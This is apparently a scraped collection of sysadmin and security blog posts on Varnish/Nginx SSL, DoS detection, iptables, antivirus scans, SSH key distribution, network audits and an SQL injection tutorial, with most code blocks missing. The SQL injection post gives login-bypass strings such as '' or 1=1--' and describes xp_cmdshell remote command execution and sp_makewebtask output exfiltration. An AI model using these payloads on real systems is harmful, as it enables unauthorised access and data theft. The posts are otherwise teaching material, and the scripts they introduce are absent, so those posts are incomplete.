Force SSL for your site with Varnish and Nginx

Hello!

For those of you who depend on Varnish to offer robust caching and scaling potential to your web stack, hearing about Google’s prioritization (albeit arguably small, for now) of sites that force SSL may cause pause in how to implement.

Varnish currently doesn’t have the ability to handle SSL certificates and encrypt requests as such. It may never actually have this ability because its focus is to cache content and it does a very good job I might add.

So if Varnish can’t handle the SSL traffic directly, how would you go about implementing this with Nginx?

Well, nginx has the ability to proxy traffic. This is one of the many reasons why some admins choose to pair Varnish with Nginx. Nginx can do reverse proxying and header manipulation out of the box without custom modules or configuration. Combine that with the lightweight production tested scalability of Nginx over Apache and the reasons are simple. We’re not interested in that debate here, just a simple implementation.

Nginx Configuration

With Nginx, you will need to add an SSL listener to handle the ssl traffic. You then assign your certificate. The actual traffic is then proxied to the (already set up) non-https listener (varnish).

The one thing to note before going further is the second last line of the configuration. That is important because it allows you to avoid an infinite redirect loop of a request proxying to varnish, varnish redirecting non-ssl to ssl and back to nginx for a proxy. You’ll notice that pretty quickly because your site will ultimately go down 🙁

What nginx is doing is defining a custom HTTP header and assigning a value of “https” to it :

So the rest of the nginx configuration can remain the same (the configuration that varnish ultimately forwards requests in order to cache).

Varnish

What you’re going to need in your varnish configuration is a minor adjustment :

What the above snippet is doing is simply checking if the header “X-Forwarded-Proto” (that nginx just set) exists and if the value equals (case insensitive) to “https”. If that is not present or matches , it sets a redirect to force the SSL connection which is handled by the nginx ssl proxy configuration above. Its also important to note that we are not just doing a clean break redirect, we are still appending the originating request URI in order to make it a smooth transition and potentially not break any previously ranked links/urls.

The last thing to note is the error 750 handler that handles the redirect in varnish :

You can see that were using a 302 temporary redirect instead of a permanent 301 redirect. This is your decision though browsers tend to be stubborn in their own internal caching of 301 redirects so 302 is good for testing.

After restarting varnish and nginx you should be able to quickly confirm that no non-SSL traffic is allowed anymore. You can not only enjoy the (marginal) SEO “bump” but you are also contributing to the HTTPS Everywhere movement which is an important cause!

Auto updating Atomicorp Mod Security Rules

Hello!

If any of you use mod_security as a web application firewall, you might have enlisted the services of Atomicorp for regularly updating your mod_security ruleset with signatures to protect against constantly changing threats to web applications in general.

One of the initial challenges, in a managed hosting environment, was to implement a system that utilizes the Atomicorp mod_security rules and update them regularly on an automated schedule.

When you subscribe to their service, they provide access credentials in order to pull the rules. You then need to integrate the rule files into your mod_security implementation and gracefully restart apache or nginx to ensure all the updated rules are loaded.

We developed a very simple python script, intended to run as a cron scheduled task, in order to accomplish this. We thought we would share it here in case anyone else may find it useful at all to accomplish the same thing. This script could easily be modified to download rules from any similar service, alternatively. This script was written for nginx, but can be changed to be integrated with apache.

Find the code below. Enjoy!

How to detect and mitigate DoS (Denial of Service) Attacks

Greetings,

Occasionally with a very busy site, being behind a hefty web stack does not always have enough capacity to mitigate a significant surge in artificial (DoS) requests. Detecting and mitigating denial of service attacks is an important and time sensitive exercise that will determine the next mitigating steps that you may need to take to reduce or null route the offending traffic.

These steps are very basic and use the everyday system utilities and tools that are found in vanilla linux implementations. The idea is to utilize these tools to identify connection and request patterns.

I’m going to assume that your potential or assumed attack is going straight to port 80 (HTTP), which would be a common assumption. A typical DoS attack would just be a generation of thousands of requests to a particular page, or perhaps just to the homepage.

Check your Process and Connection Counts

It is a good idea to get a picture of how overworked your system is currently, other than the initial reports of slow site performance or perhaps mysql errors such as “The MySQL server has gone away”, or anything of the sort.

Count how many apache/httpd processes you currently have to get an idea :

Check what the CPU load is currently on the server :

So you can see the load is quite high and there are 96 apache processes that have spawned. Looks to be quite a busy server! You should take it a step further and perhaps identify how many open port 80 (HTTP) connections you have :

So thats quite a significant number of HTTP connections on this server. It could be a substantial DoS attack, especially when you consider that this may be one server in a 3 server load balanced pool. That means the numbers here are likely multiplied by three.

Still, it could be legitimate traffic! The spike could be attributed to a link on reddit, or perhaps the site was mentioned on a popular news site. We need to look further at what requests are coming in to be able to determine if perhaps the traffic is organic or artificial. Artificial traffic would typically have thousands and thousands of identical requests, possibly coming from a series of IP addresses.

How distributed a DoS attack probably depends on the skill and resources of the offending party (potentially). If its a DoS, hopefully it will be easily identifiable.

Lets take a closer look at the open connections. Maybe we can see how many connections from singular IP addresses are currently open on the server. That may help identify if the majority of the traffic is from a single or single set of sources. This information can be kept aside after our analysis is complete so that we can use that information to report and block the traffic to ultimately mitigate the attack.

What the above line essentially does is scan the open connections specifically to port 80 and filters only the IP addresses that have 45 or more open connections. This number can obviously be adjusted to whatever you like. Take a look at the different results and see what it produces.

For potentially offending IP addresses, whois them and see where they are originating from. Are they from a Country that typically isn’t interested in your site? If the site is an English language site about local school programs in a small North American city, chances are someone from China or Russia has little legitimate interest in the site.

Analyze the Requests

In this scenario, we would be analyzing the apache access logs in order to get a clearer picture of what exactly is happening that is generating the DoS. Access logs in apache are a great resource to get the source IP, request URI and other useful information that may help identify an automated tool such as LOIC or an automated botnet perhaps that is sending thousands of identical requests to your server.

Lets filter our the actual GET requests from the apache logs, sort them and count each request in order to show the highest number of requests for the same URI. If we can take this information and then cross reference it with the connection stats we gathered earlier, we should have a clear picture of who is conducting the attack and how they are doing it.

This code filters GET requests from the logs, cleans them up, sorts the results, counts all the duplicate requests , sorts it by highest number of requests, and prints the results.

Again the 45 in the last portion of the command can be changed to whatever you feel is necessary. It all depends on whats a normal request, what is legitimate traffic and how busy your server is normally.

All the data you have gathered thus far should be enough to complete a preliminary investigation into your DoS attack. As for mitigating , there are many options. I wont go too much into it because that could be considered a completely separate topic. I’ll give some suggestions for you, either way :

Block offending IPs with IPTABLES :

Use software layer mitigation such as mod_evasive or mod_security to reduce the ability of attackers to generate significant numbers of requests. Most importantly of all, use your best judgement!

Security Penetration Testing Series : SQL Injection

I am starting a series of blog posts that detail security related strategies, penetration testing and best practice methodologies. To start our series, I am going to delve into the world of SQL injection techniques and a general overview for those who are looking to learn a little more about this method of injection.

There is already quite a bit of documentation out there regarding this, so I hope this post isn’t too redundant. There are a lot of tools out there to assist in accomplishing this task, or at the very least tools that assist in automating the probing and injection of SQL from publicly facing websites, forms and the like.

That tool is SQLMAP (http://sqlmap.sourceforge.net/). SQLMAP is an “open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of back-end database servers.”

This article does not introduce anything new, SQL injection has been widely written and used in the wild. I thought I’d write this article to document some of the SQL injection methods and hope that it may be of use to some of you out there in cyberspace.

What is SQL injection anyway?

It is a trick to inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database. Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.

What do you need?

Technically all you need is a web browser.

What should I look for?

Web forms. Any input area of a website that interacts with their database backend. Could be a login form, search form or anything like that.

You could also look for pages that actually have querystrings in the URL such as :

Testing if its vulnerable

With those query string URLs or web forms, you could do a simple test to see if its vulnerable to injection. Start with the “single quote trick” , something like this :

For example :

If you do that in a login form for example, if it works, then you will be logged in without any password necessary.

Why ‘ or 1=1–?

Let us look at another example why ‘ or 1=1– is important. Other than bypassing login, it is also possible to view extra information that is not normally available. Take an asp page that will link you to another page with the following URL:

In the URL, ‘category’ is the variable name, and ‘food’ is the value assigned to the variable. In order to do that, an ASP might contain the following code (OK, this is the actual code that we created for this exercise):

As we can see, our variable will be wrapped into v_cat and thus the SQL statement should become:

The query should return a resultset containing one or more rows that match the WHERE condition, in this case, ‘food’.

Now, assume that we change the URL into something like this:

Now, our variable v_cat equals to “food’ or 1=1– “, if we substitute this in the SQL query, we will have:

The query now should now select everything from the product table regardless if PCategory is equal to ‘food’ or not. A double dash “–” tell MS SQL server ignore the rest of the query, which will get rid of the last hanging single quote (‘). Sometimes, it may be possible to replace double dash with single hash “#”.

However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try

The SQL query will now become:

It should return the same result.

Depending on the actual SQL query, you may have to try some of these possibilities:

Remote execution with SQL injection

Being able to inject SQL commands usually means we can execute any SQL query at will.Default installation of MS SQL Server is running as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution:

Try using double quote (“) if single quote (‘) is not working.

The semi colon will end the current SQL query and thus allow you to start a new SQL command. To verify that the command executed successfully, you can listen to ICMP packet from 10.10.1.2, check if there is any packet from the server:

If you do not get any ping request from the server, and get error message indicating permission error, it is possible that the administrator has limited Web User access to these stored procedures.

Getting the output of my SQL query

It is possible to use sp_makewebtask to write your query into an HTML:

But the target IP must folder “share” sharing for Everyone.

Hope this helps!

Integrate your custom IPTables script with Linux

How do I integrate my custom iptables script with Red Hat Enterprise Linux?

A custom iptables script is sometimes necessary to work around the limitations of the Red Hat Enterprise Linux firewall configuration tool. The procedure is as follows:

1. Make sure that the default iptables initialization script is not running:

2. Execute the custom iptables script:

3. Save the newly created iptables rules:

4. Restart the iptables service:

5. Verify that the custom iptables ruleset have taken effect:

6. Enable automatic start up of the iptables service on boot up:

The custom iptables script should now be integrated into the operating system.

Scheduled antivirus scans to prevent viral injections on user generated content

When dealing with high traffic sites, especially media based or community based sites, there is always the risk of javascript, virus, XSS or other malicious injection of badness when giving a community of users the ability to upload files to your site.

There are several things to consider when evaluating all “points of entry” that are available to the public, into your systems.

Most content management and community based systems use libraries such as Imagemagick to process images (such as profile pictures) into their proper format and size.

Believe it or not, it is hard to actually inject code or other malicious data into the actual image to survive this sanitizing process. There is still risks , however. The library version you are running may be vulnerable to exploits itself.

As always, a good rule of thumb is to ensure all possible aspects of your systems are up to date and that you are aware of any security vulnerabilities as they come out so they can either be patched or addressed in some other way.

One thing to consider, especially when dealing with thousands of users and even more uploads is a scheduled scan of your user uploads using free virus scanning tools such as clamscan. This is an endpoint reporting strategy that can at least cover your ass in the event that something else was missed or a 0day vulnerability exploited.

It should be noted that the virus scans themselves aren’t intended to protect the linux systems themselves, but rather the opportunistic ‘spreading’ of compromised images and code that having an infected file on a public community based system can provide.

Its very simple to implement clamav (daemonization is not necessary), clamscan is all we need to execute regular scans at 10, 15, 30 or 60 minute intervals.

Once clamscan is implemented, definitions updated (and regular update cronjobs in place) you can roll out a script similar to the one we have here to implement the scheduled scans :

The actual cronjob entry can look something like this :

It seems like a rather simple solution — but it does provide a venue for additional sanitizing of user input. In our experience , it is best to only report on anything that clamscan might find. You can, however tell clamscan to simply delete any suspected infections it finds.

Script to distribute SSH Keys across many servers

Hello once again!

You may remember an earlier post that detailed how to implement SSH Key based authentication.

We believe it is important, when administering many (sometimes hundreds or thousands) of servers, to implement a strategy that can allow systems administrators to seamlessly run scripts, system checks or critical maintenance across all the servers.

SSH Key authentication allows for this potential. It is a very powerful strategy and should be maintained and implemented with security and efficiency as a top priority.

Distributing keys for all authorized systems administrators is something that would allow for the maintenance of this authentication system much easier — when an admin leaves or is dismissed, you need to be able to remove his or her’s keys from the “pool” quickly.

The idea behind this script is to have a centralized, highly secure and restricted key repository server. Each server in your environment would run this script to “pull” the updated key list from the central server. The script would run as a cron job and can run as often as you like. Ideally every 5-10 minutes would allow for quick key updates / distribution.

Here is the perl script :

Note that it downloads the public keys via http with wget. This can be easily modified to utilize https, if necessary, or perhaps even another protocol to make the transfer. HTTP Was chosen because the public keys are harmless and http is the easiest method. HTTPS would be desirable, however.

We hope this script helps you along the way towards making your life easier! 😉

Shell Script to Report On Hacking Attempts

It is always a good idea , when implementing open source firewall implementations (iptables, pf, etc), to build in as much reporting and verbosity as possible.

Having verbose reports on the state of your firewall, intrusion attempts and other information is key to ensuring the health and integrity of your network.

Somewhere along the line, we wrote a script to provide daily reports on intrusion attempts to penetrate our network — this usually happens when someone exceeds certain connection thresholds.

It may not be the most informative data, but the script can be modified to provide other important statistical information. It can also be modified to be used with other firewall implementations. I’m certain it wouldn’t be hard to convert this script to utilise iptables.

Below you will find the script itself — it can be set to run daily as a cronjob perhaps. Also note that the script tries to resolve a hostname for the IP address to at least provide some quick & easy information to the security administrators when determining coordinated attacks or attacks coming from compromised systems.

Enjoy!

Network Audit Bash Script Using Netbios and Nmap

Working in a large office, it is sometimes necessary to use different network audit tools in order to properly assess the integrity and security of networks.

In order to quickly audit a network , I created this script to scan selected IPs, read from a configuration file, and compile a simple report to be emailed. The script can be modified to suit your needs, such as exporting the data to a database or perhaps an HTML report for a web based reporting site.

The script itself doesn’t do anything particularly special, however it has proven useful when you want to do a quick & dirty network audit.

There are other tools out there, such as OpenAudit, Nessus and Nmap that could do similar tasks. However, the important thing to remember here is that those tools (with the exception of open audit perhaps) can be incorporated into this script to perform regular scheduled audits.

This script could actually be updated to utilize nmap v5.0 — utilizing the new features plus ndiff could turn this script into a very powerful network analysis tool.

Hopefully some of you will find some use out of the script! Enjoy!

Note that the “all_windows_linux_ips.txt” is just a text file with the ip addresses of all hostnames on your network. It can be modified to simply utilize whole subnets to make it easier to perform the audit.

Testing for weak SSL ciphers for security audits

During security audits, such as a PCI-DSS compliance audit, it is very commonplace to test the cipher mechanism that a website / server uses and supports to ensure that weak / outdated cipher methods are not used.

Weak ciphers allow for an increased risk in encryption compromise, man-in-the-middle attacks and other related attack vectors.

Due to historic export restrictions of high grade cryptography, legacy and new web servers are often able and configured to handle weak cryptographic options.

Even if high grade ciphers are normally used and installed, some server misconfiguration could be used to force the use of a weaker cipher to gain access to the supposed secure communication channel.

Testing SSL / TLS cipher specifications and requirements for site

The http clear-text protocol is normally secured via an SSL or TLS tunnel, resulting in https traffic. In addition to providing encryption of data in transit, https allows the identification of servers (and, optionally, of clients) by means of digital certificates.

Historically, there have been limitations set in place by the U.S. government to allow cryptosystems to be exported only for key sizes of, at most, 40 bits, a key length which could be broken and would allow the decryption of communications. Since then, cryptographic export regulations have been relaxed (though some constraints still hold); however, it is important to check the SSL configuration being used to avoid putting in place cryptographic support which could be easily defeated. SSL-based services should not offer the possibility to choose weak ciphers.

Testing for weak ciphers : examples

In order to detect possible support of weak ciphers, the ports associated to SSL/TLS wrapped services must be identified. These typically include port 443, which is the standard https port; however, this may change because a) https services may be configured to run on non-standard ports, and b) there may be additional SSL/TLS wrapped services related to the web application. In general, a service discovery is required to identify such ports.

The nmap scanner, via the “–sV” scan option, is able to identify SSL services. Vulnerability Scanners, in addition to performing service discovery, may include checks against weak ciphers (for example, the Nessus scanner has the capability of checking SSL services on arbitrary ports, and will report weak ciphers).

Example 1. SSL service recognition via nmap.

Example 2. Identifying weak ciphers with Nessus. The following is an anonymized excerpt of a report generated by the Nessus scanner, corresponding to the identification of a server certificate allowing weak ciphers

Example 3. Manually audit weak SSL cipher levels with OpenSSL. The following will attempt to connect to Google.com with SSLv2.

These tests usually provide a very in-depth and reliable method for ensuring weak and vulnerable ciphers are not used in order to comply with said audits.

Personally, I prefer the nessus audit scans. Usually the default “free” plugins are enough to complete these types of one-off audits. There are, however, commercial nessus plugins designed just for PCI-DSS compliance audits and are available for purchase from the nessus site.